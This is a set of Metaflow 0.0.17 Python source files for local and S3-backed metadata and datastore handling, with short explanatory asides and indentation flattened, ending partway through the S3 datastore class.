import glob
import json
import os
import time
from metaflow.metaflow_config import DATASTORE_LOCAL_DIR
from .metadata import MetadataProvider
class LocalMetadataProvider(MetadataProvider):
TYPE = 'local'
def __init__(self, environment, flow, event_logger, monitor):
super(LocalMetadataProvider, self).__init__(environment, flow, event_logger, monitor)
@classmethod
def compute_info(cls, val):
from metaflow.datastore.local import LocalDataStore
v = os.path.realpath(os.path.join(val, DATASTORE_LOCAL_DIR))
if os.path.isdir(v):
LocalDataStore.datastore_root = v
return val
raise ValueError(
'Could not find directory %s in directory %s' % (DATASTORE_LOCAL_DIR, val))
@classmethod
def default_info(cls):
from metaflow.datastore.local import LocalDataStore
def print_clean(line, **kwargs):
print(line)
v = LocalDataStore.get_datastore_root_from_config(print_clean, create_on_absent=False)
if v is None:
return '<No %s directory found in current working tree>' % DATASTORE_LOCAL_DIR
return os.path.dirname(v)
def new_run_id(self, tags=[], sys_tags=[]):
# We currently just use the timestamp to create an ID. We can be reasonably certain
# that it is unique and this makes it possible to do without coordination or
# reliance on POSIX locks in the filesystem.
run_id = '%d' % (time.time() * 1e6)
self._new_run(run_id, tags, sys_tags)
return run_id
def register_run_id(self, run_id, tags=[], sys_tags=[]):
pass
def new_task_id(self, run_id, step_name, tags=[], sys_tags=[]):
self._task_id_seq += 1
task_id = str(self._task_id_seq)
self._new_task(run_id, step_name, task_id, tags, sys_tags)
return task_id
def register_task_id(self,
run_id,
step_name,
task_id,
tags=[],
sys_tags=[]):
self._register_code_package_metadata(run_id, step_name, task_id)
def get_runtime_environment(self, runtime_name):
return {}
def register_data_artifacts(self,
run_id,
step_name,
task_id,
attempt_id,
artifacts):
meta_dir = self._create_and_get_metadir(self._flow_name, run_id, step_name, task_id)
artlist = self._artifacts_to_json(run_id, step_name, task_id, attempt_id, artifacts)
artdict = {'%d_artifact_%s' % (attempt_id, art['name']): art for art in artlist}
self._save_meta(meta_dir, artdict)
def register_metadata(self, run_id, step_name, task_id, metadata):
meta_dir = self._create_and_get_metadir(self._flow_name, run_id, step_name, task_id)
metalist = self._metadata_to_json(run_id, step_name, task_id, metadata)
ts = int(round(time.time() * 1000))
metadict = {'sysmeta_%s_%d' % (meta['field_name'], ts): meta for meta in metalist}
self._save_meta(meta_dir, metadict)
@classmethod
def _get_object_internal(cls, obj_type, obj_order, sub_type, sub_order, filters=None, *args):
from metaflow.datastore.local import LocalDataStore
if obj_type == 'artifact':
# Artifacts are actually part of the tasks in the filesystem
obj_type = 'task'
sub_type = 'artifact'
sub_order = obj_order
obj_order = obj_order - 1
# Special handling of self, artifact, and metadata
if sub_type == 'self':
meta_path = LocalMetadataProvider._get_metadir(*args[:obj_order])
if meta_path is None:
return None
self_file = os.path.join(meta_path, '_self.json')
if os.path.isfile(self_file):
return MetadataProvider._apply_filter(
[LocalMetadataProvider._read_json_file(self_file)], filters)[0]
return None
if sub_type == 'artifact':
meta_path = LocalMetadataProvider._get_metadir(*args[:obj_order])
result = []
if meta_path is None:
return result
attempt_done_files = os.path.join(meta_path, 'sysmeta_attempt-done_*')
attempts_done = sorted(glob.iglob(attempt_done_files))
if attempts_done:
successful_attempt = int(LocalMetadataProvider._read_json_file(
attempts_done[-1])['value'])
which_artifact = '*'
if len(args) >= sub_order:
which_artifact = args[sub_order - 1]
artifact_files = os.path.join(
meta_path, '%d_artifact_%s.json' % (successful_attempt, which_artifact))
for obj in glob.iglob(artifact_files):
result.append(LocalMetadataProvider._read_json_file(obj))
return result
if sub_type == 'metadata':
result = []
meta_path = LocalMetadataProvider._get_metadir(*args[:obj_order])
if meta_path is None:
return result
files = os.path.join(meta_path, 'sysmeta_*')
for obj in glob.iglob(files):
result.append(LocalMetadataProvider._read_json_file(obj))
return result
# For the other types, we locate all the objects we need to find and return them
obj_path = LocalMetadataProvider._make_path(*args[:obj_order], create_on_absent=False)
result = []
if obj_path is None:
return result
skip_dirs = '*/'*(sub_order - obj_order)
all_meta = os.path.join(obj_path, skip_dirs, LocalDataStore.METADATA_DIR)
for meta_path in glob.iglob(all_meta):
self_file = os.path.join(meta_path, '_self.json')
if os.path.isfile(self_file):
result.append(LocalMetadataProvider._read_json_file(self_file))
return MetadataProvider._apply_filter(result, filters)
@staticmethod
def _makedirs(path):
# this is for python2 compatibility.
# Python3 has os.makedirs(exist_ok=True).
try:
os.makedirs(path)
except OSError as x:
if x.errno == 17:
# Error raised when directory exists
return
else:
raise
def _ensure_meta(
self, obj_type, run_id, step_name, task_id, tags=[], sys_tags=[]):
subpath = self._create_and_get_metadir(self._flow_name, run_id, step_name, task_id)
selfname = os.path.join(subpath, '_self.json')
self._makedirs(subpath)
if os.path.isfile(selfname):
return
# In this case, the metadata information does not exist so we create it
self._save_meta(
subpath,
{'_self': self._object_to_json(
obj_type,
run_id,
step_name,
task_id,
tags + self.sticky_tags, sys_tags + self.sticky_sys_tags)})
def _new_run(self, run_id, tags=[], sys_tags=[]):
self._ensure_meta('flow', None, None, None)
self._ensure_meta('run', run_id, None, None, tags, sys_tags)
def _new_task(self, run_id, step_name, task_id, tags=[], sys_tags=[]):
self._ensure_meta('step', run_id, step_name, None)
self._ensure_meta('task', run_id, step_name, task_id, tags, sys_tags)
self._register_code_package_metadata(run_id, step_name, task_id)
@staticmethod
def _make_path(
flow_name=None, run_id=None, step_name=None, task_id=None, pathspec=None,
create_on_absent=True):
from metaflow.datastore.local import LocalDataStore
if LocalDataStore.datastore_root is None:
def print_clean(line, **kwargs):
print(line)
LocalDataStore.datastore_root = LocalDataStore.get_datastore_root_from_config(
print_clean, create_on_absent=create_on_absent)
if LocalDataStore.datastore_root is None:
return None
return LocalDataStore.make_path(flow_name, run_id, step_name, task_id, pathspec)
@staticmethod
def _create_and_get_metadir(
flow_name=None, run_id=None, step_name=None, task_id=None):
from metaflow.datastore.local import LocalDataStore
root_path = LocalMetadataProvider._make_path(flow_name, run_id, step_name, task_id)
subpath = os.path.join(root_path, LocalDataStore.METADATA_DIR)
LocalMetadataProvider._makedirs(subpath)
return subpath
@staticmethod
def _get_metadir(flow_name=None, run_id=None, step_name=None, task_id=None):
from metaflow.datastore.local import LocalDataStore
root_path = LocalMetadataProvider._make_path(
flow_name, run_id, step_name, task_id, create_on_absent=False)
if root_path is None:
return None
subpath = os.path.join(root_path, LocalDataStore.METADATA_DIR)
if os.path.isdir(subpath):
return subpath
return None
@staticmethod
def _dump_json_to_file(
filepath, data, allow_overwrite=False):
if os.path.isfile(filepath) and not allow_overwrite:
return
with open(filepath + '.tmp', 'w') as f:
json.dump(data, f)
os.rename(filepath + '.tmp', filepath)
@staticmethod
def _read_json_file(filepath):
with open(filepath, 'r') as f:
return json.load(f)
@staticmethod
def _save_meta(root_dir, metadict):
for name, datum in metadict.items():
filename = os.path.join(root_dir, '%s.json' % name)
            LocalMetadataProvider._dump_json_to_file(filename, datum)

# --- package: 6D657461666C6F77-0.0.17 | file: metaflow/metadata/local.py ---
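Aside: a minimal standalone sketch of the write-then-rename pattern that
_dump_json_to_file above relies on. os.rename is atomic on POSIX when source
and destination live on the same filesystem, so a reader never observes a
partially written JSON file. The helper name below is illustrative.

import json
import os

def atomic_json_dump(filepath, data):
    # Write to a sibling temp file, then atomically swap it into place.
    tmp = filepath + '.tmp'
    with open(tmp, 'w') as f:
        json.dump(data, f)
    os.rename(tmp, filepath)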
import json
import os
import time
from collections import namedtuple
from datetime import datetime
from metaflow.exception import MetaflowInternalError
from metaflow.util import get_username, resolve_identity
DataArtifact = namedtuple('DataArtifact',
'name ds_type url type sha')
MetaDatum = namedtuple('MetaDatum',
'field value type')
class MetadataProviderMeta(type):
def __new__(metaname, classname, bases, attrs):
return type.__new__(metaname, classname, bases, attrs)
def _get_info(classobject):
if not classobject._INFO:
classobject._INFO = classobject.default_info()
return classobject._INFO
def _set_info(classobject, val):
v = classobject.compute_info(val)
classobject._INFO = v
def __init__(classobject, classname, bases, attrs):
classobject._INFO = None
INFO = property(_get_info, _set_info)
# From https://stackoverflow.com/questions/22409430/portable-meta-class-between-python2-and-python3
def with_metaclass(mcls):
def decorator(cls):
body = vars(cls).copy()
# clean out class body
body.pop('__dict__', None)
body.pop('__weakref__', None)
return mcls(cls.__name__, cls.__bases__, body)
return decorator
@with_metaclass(MetadataProviderMeta)
class MetadataProvider(object):
@classmethod
def compute_info(cls, val):
'''
Compute the new information for this provider
The computed value should be returned and will then be accessible directly as cls.INFO.
This information will be printed by the client when describing this metadata provider
Parameters
----------
val : str
Provider specific information used in computing the new information. For example, this
can be a path.
Returns
-------
str :
Value to be set to INFO
'''
return ''
@classmethod
def default_info(cls):
'''
Returns the default information for this provider
This should compute and return the default value for the information regarding this provider.
For example, this can compute where the metadata is stored
Returns
-------
str
Value to be set by default in INFO
'''
return ''
def new_run_id(self, tags=[], sys_tags=[]):
'''
Creates an ID and registers this new run.
The run ID will be unique within a given flow.
Parameters
----------
tags : list, optional
Tags to apply to this particular run, by default []
sys_tags : list, optional
System tags to apply to this particular run, by default []
Returns
-------
int
Run ID for the run
'''
raise NotImplementedError()
def register_run_id(self, run_id, tags=[], sys_tags=[]):
'''
        Registers a run with the given run ID.
Parameters
----------
run_id : int
Run ID for this run
tags : list, optional
Tags to apply to this particular run, by default []
sys_tags : list, optional
System tags to apply to this particular run, by default []
'''
raise NotImplementedError()
def new_task_id(self, run_id, step_name, tags=[], sys_tags=[]):
'''
Creates an ID and registers this new task.
The task ID will be unique within a flow, run and step
Parameters
----------
run_id : int
ID of the run
step_name : string
Name of the step
tags : list, optional
Tags to apply to this particular task, by default []
sys_tags : list, optional
System tags to apply to this particular task, by default []
Returns
-------
int
Task ID for the task
'''
raise NotImplementedError()
def register_task_id(self, run_id, step_name, task_id, tags=[], sys_tags=[]):
'''
        Registers a task with the given task ID.
Parameters
----------
run_id : int or convertible to int
Run ID for this run
step_name : string
Name of the step
task_id : int
Task ID
tags : list, optional
Tags to apply to this particular run, by default []
sys_tags : list, optional
System tags to apply to this particular run, by default []
'''
raise NotImplementedError()
def get_runtime_environment(self, runtime_name):
'''
Returns a dictionary of environment variables to be set
Parameters
----------
runtime_name : string
Name of the runtime for which to get the environment
Returns
-------
dict[string] -> string
Environment variables from this metadata provider
'''
raise NotImplementedError()
def register_data_artifacts(self,
run_id,
step_name,
task_id,
attempt_id,
artifacts):
'''
Registers the fact that the data-artifacts are associated with
the particular task.
Artifacts produced by a given task can be associated with the
task using this call
Parameters
----------
run_id : int
Run ID for the task
step_name : string
Step name for the task
task_id : int
Task ID for the task
attempt_id : int
Attempt for the task
artifacts : List of DataArtifact
Artifacts associated with this task
'''
raise NotImplementedError()
def register_metadata(self, run_id, step_name, task_id, metadata):
'''
Registers metadata with a task.
Note that the same metadata can be registered multiple times for the same task (for example
by multiple attempts). Internally, the timestamp of when the registration call is made is
also recorded allowing the user to determine the latest value of the metadata.
Parameters
----------
run_id : int
Run ID for the task
step_name : string
Step name for the task
task_id : int
Task ID for the task
metadata : List of MetaDatum
Metadata associated with this task
'''
raise NotImplementedError()
@classmethod
def _get_object_internal(cls, obj_type, obj_order, sub_type, sub_order, filters=None, *args):
'''
Return objects for the implementation of this class
        See get_object for the description of what this function does
Parameters
----------
obj_type : string
One of 'root', 'flow', 'run', 'step', 'task', 'artifact'
        obj_order: int
            Order in the list ['root', 'flow', 'run', 'step', 'task', 'artifact']
        sub_type : string
            Same as obj_type with the addition of 'metadata', 'self'
        sub_order : int
            Order in the same list as the one for obj_order + ['metadata', 'self']
filters : dict
Dictionary with keys 'any_tags', 'tags' and 'system_tags'. If specified
will return only objects that have the specified tags present. Filters
are ANDed together so all tags must be present for the object to be returned.
Return
------
object or list :
            Depending on the call, the type of the returned object varies
'''
raise NotImplementedError()
def add_sticky_tags(self, tags=[], sys_tags=[]):
'''
Adds tags to be added to every run and task
Tags can be added to record information about a run/task. Such tags can be specified on a
per run or task basis using the new_run_id/register_run_id or new_task_id/register_task_id
functions but can also be set globally using this function. Tags added here will be
added to every run/task created after this call is made.
Parameters
----------
tags : list, optional
Tags to add to every run/task, by default []
sys_tags : list, optional
System tags to add to every run/task, by default []
'''
self.sticky_tags.extend(tags)
self.sticky_sys_tags.extend(sys_tags)
@classmethod
def get_object(cls, obj_type, sub_type, filters=None, *args):
'''Returns the requested object depending on obj_type and sub_type
obj_type can be one of 'root', 'flow', 'run', 'step', 'task',
or 'artifact'
sub_type describes the aggregation required and can be either:
'metadata', 'self' or any of obj_type provided that it is slotted below
the object itself. For example, if obj_type is 'flow', you can
specify 'run' to get all the runs in that flow.
A few special rules:
- 'metadata' is only allowed for obj_type 'task'
- For obj_type 'artifact', only 'self' is allowed
A few examples:
- To get a list of all flows:
- set obj_type to 'root' and sub_type to 'flow'
- To get a list of all tasks:
- set obj_type to 'root' and sub_type to 'task'
- To get a list of all artifacts in a task:
- set obj_type to 'task' and sub_type to 'artifact'
- To get information about a specific flow:
- set obj_type to 'flow' and sub_type to 'self'
Parameters
----------
obj_type : string
One of 'root', 'flow', 'run', 'step', 'task', 'artifact' or 'metadata'
sub_type : string
Same as obj_type with the addition of 'self'
filters : dict
Dictionary with keys 'any_tags', 'tags' and 'system_tags'. If specified
will return only objects that have the specified tags present. Filters
are ANDed together so all tags must be present for the object to be returned.
Return
------
object or list :
            Depending on the call, the type of the returned object varies
'''
obj_order = {
'root': 0,
'flow': 1,
'run': 2,
'step': 3,
'task': 4,
'artifact': 5,
'metadata': 6,
'self': 7}
type_order = obj_order.get(obj_type)
sub_order = obj_order.get(sub_type)
if type_order is None:
raise MetaflowInternalError(msg='Cannot find type %s' % obj_type)
if type_order > 5:
raise MetaflowInternalError(msg='Type %s is not allowed' % obj_type)
if sub_order is None:
raise MetaflowInternalError(msg='Cannot find subtype %s' % sub_type)
if type_order >= sub_order:
raise MetaflowInternalError(msg='Subtype %s not allowed for %s' % (sub_type, obj_type))
# Metadata is always only at the task level
if sub_type == 'metadata' and obj_type != 'task':
raise MetaflowInternalError(msg='Metadata can only be retrieved at the task level')
return cls._get_object_internal(obj_type, type_order, sub_type, sub_order, filters, *args)
def _all_obj_elements(self, tags=[], sys_tags=[]):
user = get_username()
return {
'flow_id': self._flow_name,
'user_name': user,
'tags': tags,
'system_tags': sys_tags,
'ts_epoch': int(round(time.time() * 1000))}
def _flow_to_json(self, tags=[], sys_tags=[]):
return self._all_obj_elements(tags, sys_tags)
def _run_to_json(self, run_id=None, tags=[], sys_tags=[]):
if run_id is not None:
d = {'run_number': run_id}
else:
d = {}
d.update(self._all_obj_elements(tags, sys_tags))
return d
def _step_to_json(self, run_id, step_name, tags=[], sys_tags=[]):
d = {
'run_number': run_id,
'step_name': step_name}
d.update(self._all_obj_elements(tags, sys_tags))
return d
def _task_to_json(self, run_id, step_name, task_id=None, tags=[], sys_tags=[]):
d = {
'run_number': run_id,
'step_name': step_name}
if task_id is not None:
d['task_id'] = task_id
d.update(self._all_obj_elements(tags, sys_tags))
return d
def _object_to_json(
self, obj_type, run_id=None, step_name=None, task_id=None, tags=[], sys_tags=[]):
if obj_type == 'task':
return self._task_to_json(run_id, step_name, task_id, tags, sys_tags)
if obj_type == 'step':
return self._step_to_json(run_id, step_name, tags, sys_tags)
if obj_type == 'run':
return self._run_to_json(run_id, tags, sys_tags)
return self._flow_to_json(tags, sys_tags)
def _artifacts_to_json(self, run_id, step_name, task_id, attempt_id, artifacts):
result = []
for art in artifacts:
d = {
'run_number': run_id,
'step_name': step_name,
'task_id': task_id,
'attempt_id': attempt_id,
'name': art.name,
'content_type': art.type,
'type': 'metaflow.artifact',
'sha': art.sha,
'ds_type': art.ds_type,
'location': art.url}
d.update(self._all_obj_elements(self.sticky_tags, self.sticky_sys_tags))
result.append(d)
return result
def _metadata_to_json(self, run_id, step_name, task_id, metadata):
user = get_username()
return [{
'flow_id': self._flow_name,
'run_number': run_id,
'step_name': step_name,
'task_id': task_id,
'field_name': datum.field,
'type': datum.type,
'value': datum.value,
'user_name': user,
'ts_epoch': int(round(time.time() * 1000))} for datum in metadata]
def _tags(self):
env = self._environment.get_environment_info()
tags = [
resolve_identity(),
'runtime:' + env['runtime'],
'python_version:' + env['python_version_code'],
'date:' + datetime.utcnow().strftime('%Y-%m-%d')]
if env['metaflow_version']:
tags.append('metaflow_version:' + env['metaflow_version'])
return tags
def _register_code_package_metadata(self, run_id, step_name, task_id):
metadata = []
code_sha = os.environ.get('METAFLOW_CODE_SHA')
code_url = os.environ.get('METAFLOW_CODE_URL')
code_ds = os.environ.get('METAFLOW_CODE_DS')
if code_sha:
metadata.append(MetaDatum(
field='code-package',
value=json.dumps({'ds_type': code_ds, 'sha': code_sha, 'location': code_url}),
type='code-package'))
if metadata:
self.register_metadata(run_id, step_name, task_id, metadata)
@staticmethod
def _apply_filter(elts, filters):
if filters is None:
return elts
starting_point = elts
result = []
for key, value in filters.items():
if key == 'any_tags':
for obj in starting_point:
if value in obj.get('tags', []) or value in obj.get('system_tags', []):
result.append(obj)
if key == 'tags':
for obj in starting_point:
if value in obj.get('tags', []):
result.append(obj)
if key == 'system_tags':
for obj in starting_point:
if value in obj.get('system_tags', []):
result.append(obj)
starting_point = result
result = []
return starting_point
def __init__(self, environment, flow, event_logger, monitor):
self._task_id_seq = -1
self.sticky_tags = []
self.sticky_sys_tags = []
self._flow_name = flow.name
self._event_logger = event_logger
self._monitor = monitor
self._environment = environment
self._runtime = os.environ.get(
'METAFLOW_MLI_RUNTIME_NAME', 'dev')
        self.add_sticky_tags(sys_tags=self._tags())

# --- package: 6D657461666C6F77-0.0.17 | file: metaflow/metadata/metadata.py ---
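Aside: a small standalone demonstration of the AND semantics of
MetadataProvider._apply_filter above; each filter key narrows the result of
the previous key, so an object must match every filter to be returned. The
sample objects are made up for illustration; the import path follows this
package's layout.

from metaflow.metadata.metadata import MetadataProvider

objs = [
    {'id': 'a', 'tags': ['prod'], 'system_tags': ['runtime:dev']},
    {'id': 'b', 'tags': [], 'system_tags': ['runtime:dev']},
]
# Both filters must match, so only object 'a' survives.
filtered = MetadataProvider._apply_filter(
    objs, {'tags': 'prod', 'system_tags': 'runtime:dev'})
assert [o['id'] for o in filtered] == ['a']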
import os
import json
import gzip
from tempfile import NamedTemporaryFile
from metaflow.metaflow_config import DATASTORE_LOCAL_DIR, DATASTORE_SYSROOT_LOCAL
from .datastore import MetaflowDataStore, DataException, only_if_not_done
from ..metadata import MetaDatum
class LocalDataStore(MetaflowDataStore):
TYPE = 'local'
METADATA_DIR = '_meta'
def _makedirs(self, path):
try:
os.makedirs(path)
except OSError as x:
if x.errno == 17:
return
else:
raise
def object_path(self, sha):
root = os.path.join(self.data_root, sha[:2])
return os.path.join(root, sha)
@classmethod
def get_datastore_root_from_config(cls, echo, create_on_absent=True):
# Compute path for DATASTORE_SYSROOT_LOCAL
result = DATASTORE_SYSROOT_LOCAL
if result is None:
try:
# Python2
current_path = os.getcwdu()
except: # noqa E722
current_path = os.getcwd()
check_dir = os.path.join(current_path, DATASTORE_LOCAL_DIR)
check_dir = os.path.realpath(check_dir)
orig_path = check_dir
top_level_reached = False
while not os.path.isdir(check_dir):
new_path = os.path.dirname(current_path)
if new_path == current_path:
top_level_reached = True
break # We are no longer making upward progress
current_path = new_path
check_dir = os.path.join(current_path, DATASTORE_LOCAL_DIR)
if top_level_reached:
if create_on_absent:
# Could not find any directory to use so create a new one
echo('Creating local datastore in current directory (%s)' % orig_path,
fg='magenta', bold=True)
os.mkdir(orig_path)
result = orig_path
else:
return None
else:
result = check_dir
else:
result = os.path.join(result, DATASTORE_LOCAL_DIR)
return result
@classmethod
def get_latest_tasks(cls,
flow_name,
run_id=None,
steps=None,
pathspecs=None):
run_prefix = cls.make_path(flow_name, run_id)
data_blobs = []
if os.path.exists(run_prefix):
if steps is None:
steps = [s for s in os.listdir(run_prefix) if s != cls.METADATA_DIR]
if pathspecs is None:
task_prefixes = []
for step in steps:
step_prefix = cls.make_path(flow_name, run_id, step)
for task in os.listdir(step_prefix):
if task == cls.METADATA_DIR:
continue
task_prefixes.append(
cls.make_path(flow_name, run_id, step, task))
else:
task_prefixes = [cls.make_path(flow_name, pathspec)
for pathspec in pathspecs]
for task_prefix in task_prefixes:
step, task = task_prefix.split('/')[-2:]
# Sort the file listing to iterate in increasing order of
# attempts.
latest_data_path = None
latest_attempt = None
latest_done_attempt = None
for fname in sorted(os.listdir(task_prefix)):
if cls.is_done_filename(fname):
_, attempt = cls.parse_filename(fname)
latest_done_attempt = attempt
# Read the corresponding metadata file.
meta_fname = \
cls.get_metadata_filename_for_attempt(attempt)
latest_data_path = os.path.join(task_prefix, meta_fname)
elif cls.is_attempt_filename(fname):
_, attempt = cls.parse_filename(fname)
latest_attempt = attempt
# Only read the metadata if the latest attempt is also done.
if latest_done_attempt is not None and\
latest_done_attempt == latest_attempt:
with open(latest_data_path) as f:
data_blobs.append((step, task, attempt, f.read()))
return data_blobs
else:
raise DataException("Couldn't find data at %s" % run_prefix)
@classmethod
def get_artifacts(cls, artifacts_to_prefetch):
artifact_list = []
for path in artifacts_to_prefetch:
sha = path.split('/')[-1]
artifact_list.append((sha,
cls.decode_gzip_data(path)))
return artifact_list
@only_if_not_done
def save_log(self, logtype, bytebuffer):
"""
Save a task-specific log file represented as a bytes object.
"""
path = self.get_log_location(logtype)
with open(path + '.tmp', 'wb') as f:
f.write(bytebuffer)
os.rename(path + '.tmp', path)
return path
def load_log(self, logtype, attempt_override=None):
"""
Load a task-specific log file represented as a bytes object.
"""
path = self.get_log_location(logtype, attempt_override)
with open(path, 'rb') as f:
return f.read()
@only_if_not_done
def save_metadata(self, name, metadata):
"""
Save a task-specific metadata dictionary as JSON.
"""
self._makedirs(self.root)
filename = self.filename_with_attempt_prefix('%s.json' % name,
self.attempt)
path = os.path.join(self.root, filename)
with open(path + '.tmp', 'w') as f:
json.dump(metadata, f)
os.rename(path + '.tmp', path)
def load_metadata(self, name):
"""
Load a task-specific metadata dictionary as JSON.
"""
filename = self.filename_with_attempt_prefix('%s.json' % name,
self.attempt)
path = os.path.join(self.root, filename)
with open(path) as f:
return json.load(f)
def has_metadata(self, name, with_attempt=True):
attempt = self.attempt if with_attempt else None
filename = self.filename_with_attempt_prefix('%s.json' % name, attempt)
path = os.path.join(self.root, filename)
return os.path.exists(path)
@only_if_not_done
def save_data(self, sha, transformable_object):
"""
Save a content-addressed data blob if it doesn't exist already.
"""
path = self.object_path(sha)
if not os.path.exists(path):
self._makedirs(os.path.dirname(path))
# NOTE multiple tasks may try to save an object with the
# same sha concurrently, hence we need to use a proper tmp
# file
with NamedTemporaryFile(dir=os.path.dirname(path),
prefix='blobtmp.',
delete=False) as tmp:
# NOTE compresslevel makes a huge difference. The default
# level of 9 can be impossibly slow.
with gzip.GzipFile(fileobj=tmp,
mode='wb',
compresslevel=3) as f:
f.write(transformable_object.current())
os.rename(tmp.name, path)
return path
def load_data(self, sha):
"""
Load a content-addressed data blob.
"""
with gzip.open(self.object_path(sha), 'rb') as f:
return f.read()
@only_if_not_done
def done(self):
"""
Write a marker indicating that datastore has finished writing to
this path.
"""
filename = self.get_done_filename_for_attempt(self.attempt)
path = os.path.join(self.root, filename)
self._makedirs(self.root)
try:
# this is for python2 compatibility.
# Python3 has open(mode='x').
fd = os.fdopen(os.open(path,
os.O_EXCL | os.O_WRONLY | os.O_CREAT),
'wb')
fd.close()
except OSError as x:
if x.errno == 17:
raise DataException('Path %s already exists. Try with a '
'different --run-id.' % path)
else:
raise
self.metadata.register_metadata(
self.run_id, self.step_name, self.task_id,
[MetaDatum(field='attempt-done', value=str(self.attempt), type='attempt-done')])
self._is_done_set = True
def is_done(self):
"""
A flag indicating whether this datastore directory was closed
        successfully with done().
"""
filename = self.get_done_filename_for_attempt(self.attempt)
path = os.path.join(self.root, filename)
        return os.path.exists(path)

# --- package: 6D657461666C6F77-0.0.17 | file: metaflow/datastore/local.py ---
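Aside: a standalone sketch of the content-addressed layout that object_path
above implements; blobs are keyed by their SHA1 digest and sharded into
subdirectories by the first two hex characters so that no single directory
grows unboundedly.

import os
from hashlib import sha1

def object_path(data_root, blob):
    # Key the blob by its SHA1 and shard by the first two hex characters.
    sha = sha1(blob).hexdigest()
    return os.path.join(data_root, sha[:2], sha)

# object_path('/ds/MyFlow/data', b'hello')
# -> '/ds/MyFlow/data/aa/aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d'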
import os
import sys
import json
import gzip
try:
# python2
from urlparse import urlparse
import cStringIO
BytesIO = cStringIO.StringIO
except:
# python3
from urllib.parse import urlparse
import io
BytesIO = io.BytesIO
from .datastore import MetaflowDataStore, DataException, only_if_not_done
from ..metadata import MetaDatum
from .util.s3util import aws_retry, get_s3_client
class S3DataStore(MetaflowDataStore):
TYPE='s3'
s3 = None
ClientError = None
def __init__(self, *args, **kwargs):
self.reset_client()
super(S3DataStore, self).__init__(*args, **kwargs)
@classmethod
def reset_client(cls, hard_reset=False):
# the s3 client is shared across all S3DataStores
# so we don't open N connections to S3 unnecessarily
if cls.s3 is None or hard_reset:
cls.s3, cls.ClientError = get_s3_client()
@aws_retry
def _get_s3_object(self, path, return_buf=False):
url = urlparse(path)
buf = BytesIO()
if self.monitor:
with self.monitor.measure("metaflow.s3.get_object"):
self.s3.download_fileobj(url.netloc, url.path.lstrip('/'), buf)
else:
self.s3.download_fileobj(url.netloc, url.path.lstrip('/'), buf)
if return_buf:
buf.seek(0)
return buf
else:
return buf.getvalue()
@aws_retry
def _put_s3_object(self, path, blob=None, buf=None):
url = urlparse(path)
if buf is None:
buf = BytesIO(blob)
if self.monitor:
with self.monitor.measure("metaflow.s3.put_object"):
self.s3.upload_fileobj(buf, url.netloc, url.path.lstrip('/'))
else:
self.s3.upload_fileobj(buf, url.netloc, url.path.lstrip('/'))
@aws_retry
def _head_s3_object(self, path):
url = urlparse(path)
try:
return self.s3.head_object(Bucket=url.netloc, Key=url.path.lstrip('/'))
except self.ClientError as err:
error_code = int(err.response['Error']['Code'])
if error_code == 404:
return None
else:
raise
@classmethod
def get_latest_tasks(cls,
flow_name,
run_id=None,
steps=None,
pathspecs=None):
run_prefix = cls.make_path(flow_name, run_id)
from metaflow import S3
with S3() as s3:
task_urls = []
# Note: When `pathspecs` is specified, we avoid the eventually
# consistent `s3.list_paths` operation, and directly construct the
# task_urls list.
if pathspecs:
task_urls = [cls.make_path(flow_name, pathspec=pathspec)
for pathspec in pathspecs]
elif steps:
task_objs = s3.list_paths(
[cls.make_path(flow_name, run_id, step) for step in steps])
task_urls = [task.url for task in task_objs]
else:
step_objs = s3.list_paths([run_prefix])
task_objs = s3.list_paths([step.url for step in step_objs])
task_urls = [task.url for task in task_objs]
urls = []
for task_url in task_urls:
for attempt in range(5):
metadata_filename = \
cls.get_metadata_filename_for_attempt(attempt)
urls.append(os.path.join(task_url, metadata_filename))
# Note for potential future optimization:
# Find the list of latest attempt for each task first, and
# follow up with a call to get done and metadata.
attempt_filename = \
cls.get_filename_for_attempt(attempt)
urls.append(os.path.join(task_url, attempt_filename))
done_filename = cls.get_done_filename_for_attempt(attempt)
urls.append(os.path.join(task_url, done_filename))
results = s3.get_many(urls, return_missing=True)
all_data_blobs = {}
latest_attempt = {}
done_attempts = set()
for result in results:
if result.exists:
path = result.url
step_name, task_id, fname = path.split('/')[-3:]
_, attempt = cls.parse_filename(fname)
if cls.is_done_filename(fname):
done_attempts.add((step_name, task_id, attempt))
elif cls.is_attempt_filename(fname):
# files are in sorted order, so overwrite is ok.
latest_attempt[(step_name, task_id)] = attempt
else:
# is_metadata_filename(fname) == True.
all_data_blobs[(step_name, task_id, attempt)] = \
result.blob
latest_attempts = set((step_name, task_id, attempt)
for (step_name, task_id), attempt
in latest_attempt.items())
latest_and_done = latest_attempts & done_attempts
return [(step_name, task_id, attempt,
all_data_blobs[(step_name, task_id, attempt)])
for step_name, task_id, attempt in latest_and_done]
@classmethod
def get_artifacts(cls, artifacts_to_prefetch):
artifact_list = []
from metaflow import S3
with S3() as s3:
for obj in s3.get_many(artifacts_to_prefetch):
sha = obj.key.split('/')[-1]
artifact_list.append((sha, cls.decode_gzip_data(obj.path)))
return artifact_list
@only_if_not_done
def save_metadata(self, name, data):
"""
Save a task-specific metadata dictionary as JSON.
"""
filename = self.filename_with_attempt_prefix('%s.json' % name,
self.attempt)
path = os.path.join(self.root, filename)
self._put_s3_object(path, json.dumps(data).encode('utf-8'))
def has_metadata(self, name, with_attempt=True):
attempt = self.attempt if with_attempt else None
filename = self.filename_with_attempt_prefix('%s.json' % name,
attempt)
path = os.path.join(self.root, filename)
return bool(self._head_s3_object(path))
def load_metadata(self, name):
"""
Load a task-specific metadata dictionary as JSON.
"""
filename = self.filename_with_attempt_prefix('%s.json' % name,
self.attempt)
path = os.path.join(self.root, filename)
return json.loads(self._get_s3_object(path).decode('utf-8'))
def object_path(self, sha):
root = os.path.join(self.data_root, sha[:2])
return os.path.join(root, sha)
@only_if_not_done
def save_data(self, sha, transformable_object):
"""
Save a content-addressed data blob if it doesn't exist already.
"""
path = self.object_path(sha)
if not self._head_s3_object(path):
buf = BytesIO()
# NOTE compresslevel makes a huge difference. The default
# level of 9 can be impossibly slow.
with gzip.GzipFile(fileobj=buf,
mode='wb',
compresslevel=3) as f:
f.write(transformable_object.current())
transformable_object.transform(lambda _: buf)
buf.seek(0)
self._put_s3_object(path, buf=buf)
return path
def load_data(self, sha):
"""
Load a content-addressed data blob.
"""
path = self.object_path(sha)
buf = self._get_s3_object(path, return_buf=True)
return self.decode_gzip_data(None, buf) # filename=None
@only_if_not_done
def save_log(self, logtype, bytebuffer):
"""
Save a log file represented as a bytes object.
"""
path = self.get_log_location(logtype)
self._put_s3_object(path, bytebuffer)
return path
def load_log(self, logtype, attempt_override=None):
"""
Load a task-specific log file represented as a bytes object.
"""
